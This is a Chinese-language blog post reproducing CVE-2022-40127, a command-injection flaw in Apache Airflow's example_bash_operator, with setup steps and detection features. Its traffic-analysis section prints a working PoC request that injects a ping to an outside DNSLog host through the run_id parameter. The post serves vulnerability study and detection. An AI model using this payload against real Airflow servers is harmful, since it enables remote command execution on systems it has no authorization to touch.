CVE-2022-40127 Apache Airflow代码注入漏洞复现

本文详细介绍了Apache Airflow中CVE-2022-40127代码注入漏洞的原理,影响版本,环境搭建过程以及漏洞复现步骤。通过DNSLog和流量分析,揭示了攻击者的POC特征,并给出了修复建议。提醒读者,该内容仅供参考学习,不可用于非法目的。
摘要由CSDN通过智能技术生成

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

Docker环境:

0x06 漏洞复现:

DNSLog:

POC利用:

查看DNSLog:

0x07 流量分析:

Dns请求特征:

POC特征:

0x08 修复建议:


0x01 声明:

        仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

        Apache Airflow是一款开源的,分布式任务调度框架,它将一个具有上下级依赖关系的工作流,组装成一个有向无环图。

0x03 漏洞概述:

        Apache Airflow 内置的 example_bash_operator 工作流中的 run_id 参数可以被执行,攻击者控制此参数并造成命令注入,从而 RCE。

0x04 影响版本:

        Apache Airflow < 2.4.0

0x05 环境搭建:

Docker环境:

        参考这篇文章:(Docker&Docker-compose环境安装_Evan Kang的博客-CSDN博客)

漏洞环境:

curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'

mkdir -p ./dags ./logs ./plugins

echo -e "AIRFLOW_UID=$(id -u)" > .env

docker-compose up airflow-init

docker-compose up -d

!!waiting some times!!

open ip:8080
账号:airflow

密码:airflow

0x06 漏洞复现:

DNSLog:

POC利用:

查看DNSLog:

0x07 流量分析:

Dns请求特征:

POC特征:

客户端请求:

URL:

POST /trigger?dag_id=example_bash_operator

DATA:

run_id=%7B%22fxoxx%22%3A%22%5C%22%3Bping+tqpofh.dnslog.cn%3B%5C%22%22%7D

0x08 修复建议:

        官方已经针对漏洞发布了版本更新(最新版为2.4.3),下载地址如下:

https://airflow.apache.org/docs/apache-airflow/stable/installation/installing-from-sources.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kang_Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值